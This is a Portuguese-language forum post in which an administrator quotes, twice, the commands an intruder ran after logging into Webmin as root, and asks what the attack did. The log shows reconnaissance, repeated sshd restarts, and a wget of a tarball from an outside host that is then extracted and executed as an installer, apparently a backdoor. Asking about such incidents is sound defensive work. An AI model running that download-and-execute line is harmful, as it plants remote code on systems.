Enviado em 17/07/2008 - 16:09h
Pessoal, acessaram uma das máquinas da rede, logaram no webmin como root e executaram os comando abaixo:
Sabem me dizer o que foi realizado nessa invasão?
echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;uname -a;id;uptime
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;wget members.lycos.co.uk/velentax/back.tar;tar xzvf back.tar;rm -rf back.tar;cd back;chmod +x *;./inst
echo -n BUFUWUZHERE;/etc/init.d/ssh restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;ls
echo -n BUFUWUZHERE;cd /var/tmp;rm -rf back
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;
Sabem me dizer o que foi realizado nessa invasão?
echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;uname -a;id;uptime
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;wget members.lycos.co.uk/velentax/back.tar;tar xzvf back.tar;rm -rf back.tar;cd back;chmod +x *;./inst
echo -n BUFUWUZHERE;/etc/init.d/ssh restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;ls
echo -n BUFUWUZHERE;cd /var/tmp;rm -rf back
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;